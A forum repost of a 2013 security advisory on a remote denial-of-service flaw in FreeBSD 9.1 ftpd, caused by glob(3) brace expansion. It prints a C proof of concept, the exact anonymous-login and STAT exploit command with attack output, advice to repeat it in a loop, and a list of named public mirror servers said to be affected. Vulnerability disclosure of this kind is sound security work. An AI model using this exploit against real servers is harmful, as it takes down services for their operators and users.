Author Topic: Remote denial of service in ftpd for FreeBSD 9.1 (Read 5640 times)


WHK (Administrator)
Remote denial of service in ftpd for FreeBSD 9.1
« on: February 05, 2013, 10:52:12 am »
Very recently a version of the FTP server for FreeBSD 9.1 was patched that allowed a remote attacker to cause a denial of service with a simple script.

Here I copy and paste the news:

FreeBSD 9.1 ftpd Remote Denial of Service
Maksymilian Arciemowicz
http://cxsecurity.org/
http://cxsec.org/

Public Date: 01.02.2013
URL: http://cxsecurity.com/issue/WLB-2013020003

Affected servers:
- ftp.uk.freebsd.org,
- ftp.ua.freebsd.org,
- ftp5.freebsd.org,
- ftp5.us.freebsd.org,
- ftp10.freebsd.org,
- ftp3.uk.freebsd.org,
- ftp7.ua.freebsd.org,
- ftp2.se.freebsd.org,
- ftp2.za.FreeBSD.org,
- ftp2.ru.freebsd.org,
- ftp2.pl.freebsd.org
and more...

--- 1. Description ---
I have decided to check BSD ftpd servers once again for wildcards. An old
bug in libc (CVE-2011-0418) allows a Denial of Service of ftpd in the latest
FreeBSD version.
An attacker who can connect anonymously to the FTP server may cause CPU
resource exhaustion. Logging in with 'USER anonymous' 'PASS anonymous' and
sending a 'STAT' command with a special wildcard is enough to create an ftpd
process with 100% CPU usage.

Proof of Concept (PoC):
See the difference between NetBSD/libc and FreeBSD/libc.
--- PoC ---

Code:
#include <stdio.h>
#include <glob.h>

int main(void)
{
        glob_t globbuf;
        /* every "{a,b}" group doubles the number of candidate strings that
         * brace expansion must generate before any path is even checked */
        char stringa[]="{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}";
        /* GLOB_LIMIT is a BSD extension; the advisory's point is that it does
         * not stop the expansion work on FreeBSD */
        glob(stringa, GLOB_BRACE|GLOB_NOCHECK|GLOB_TILDE|GLOB_LIMIT, NULL, &globbuf);
        globfree(&globbuf);
        return 0;
}
--- PoC ---

--- Exploit ---
user anonymous
pass anonymous

Code:
stat {a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}
--- /Exploit ---

Result of attack:

ftp    13034  0.0  0.4  10416  1944  ??    10:48PM    0:00.96 ftpd: cxsec.org anonymous/anonymous (ftpd)
ftp    13035  0.0  0.4  10416  1944  ??    10:48PM    0:00.89 ftpd: cxsec.org anonymous/anonymous (ftpd)
ftp    13036  0.0  0.4  10416  1944  ??    10:48PM    0:00.73 ftpd: cxsec.org anonymous/anonymous (ftpd)
ftp    13046  0.0  0.4  10416  1952  ??    10:48PM    0:00.41 ftpd: cxsec.org anonymous/anonymous (ftpd)
ftp    13047  0.0  0.4  10416  1960  ??    10:48PM    0:00.42 ftpd: cxsec.org anonymous/anonymous (ftpd)
...
root    13219  0.0  0.3  10032  1424  ??    10:52PM    0:00.00 /usr/libexec/ftpd -dDA
root    13225  0.0  0.3  10032  1428  ??    10:52PM    0:00.00 /usr/libexec/ftpd -dDA
root    13409  0.0  0.3  10032  1404  ??    10:53PM    0:00.00 /usr/libexec/ftpd -dDA
root    13410  0.0  0.3  10032  1404  ??    10:53PM    0:00.00 /usr/libexec/ftpd -dDA
...

=>Sending:
STAT {a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}

=>Result:
@ps:
ftp      1336 100.0  0.5  10416  2360  ??    11:15PM 600:39.95 ftpd: 127.0.0.1: anonymous/anonymous@cxsecurity.com: \r\n (ftpd)$
@top:
1336 root        1 103    0 10416K  2360K RUN    600:53 100.00% ftpd

One request: over 600m (~10h) execution time and 100% CPU usage. This
issue allows creating N ftpd processes with 100% CPU usage.

Just create a while(1) loop and send these commands
---
user anonymous
pass anonymous

Code:
stat {a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}
---

NetBSD and OpenBSD have fixed this issue in glob(3)/libc (2011)
http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gen/glob.c.diff?r1=1.24&r2=1.23.10.2

The funniest thing is that FreeBSD uses GLOB_LIMIT in the ftpd server.
http://www.freebsd.org/cgi/cvsweb.cgi/src/libexec/ftpd/ftpd.c
---

Code:
        /* excerpt from ftpd.c: gl_matchc = MAXGLOBARGS plus GLOB_LIMIT is
         * meant to cap the number of matches glob(3) will produce */
        if (strpbrk(whichf, "~{[*?") != NULL) {
                int flags = GLOB_BRACE|GLOB_NOCHECK|GLOB_TILDE;

                memset(&gl, 0, sizeof(gl));
                gl.gl_matchc = MAXGLOBARGS;
                flags |= GLOB_LIMIT;
                freeglob = 1;
                if (glob(whichf, flags, 0, &gl)) {
---

but GLOB_LIMIT in FreeBSD doesn't work. The glob(3) function allows CPU
resource exhaustion. ;]

Libc was also vulnerable in Apple and Oracle products.
http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html
http://support.apple.com/kb/HT4723

only FreeBSD and GNU glibc are affected


--- 2. Exploit ---
http://cxsecurity.com/issue/WLB-2013010233


--- 3. Fix ---
Don't use ftpd on FreeBSD systems. :) You may use vsftpd to resolve the
security problem ;)


--- 4. References ---
Multiple Vendors libc/glob(3) remote ftpd resource exhaustion
http://cxsecurity.com/issue/WLB-2010100135
http://cxsecurity.com/cveshow/CVE-2010-2632

Multiple FTPD Server GLOB_BRACE|GLOB_LIMIT memory exhaustion
http://cxsecurity.com/issue/WLB-2011050004
http://cxsecurity.com/cveshow/CVE-2011-0418

More CWE-399 resource exhaustion examples:
http://cxsecurity.com/cwe/CWE-399

The regcomp implementation in the GNU C Library allows attackers to
cause a denial of service in proftpd
http://cxsecurity.com/cveshow/CVE-2010-4051
http://cxsecurity.com/cveshow/CVE-2010-4052
http://www.kb.cert.org/vuls/id/912279


--- 5. Contact ---
Maksymilian Arciemowicz
max 4T cxsecurity.com
http://cxsecurity.com/
http://cxsec.org/

Source: http://seclists.org/fulldisclosure/2013/Feb/3

My WEB - The Hacktivism is not a crime - If I don't do it, let others do it -
If you found this article useful, remember that you can help us with your voluntary donation, which helps the staff and the upkeep of the forum.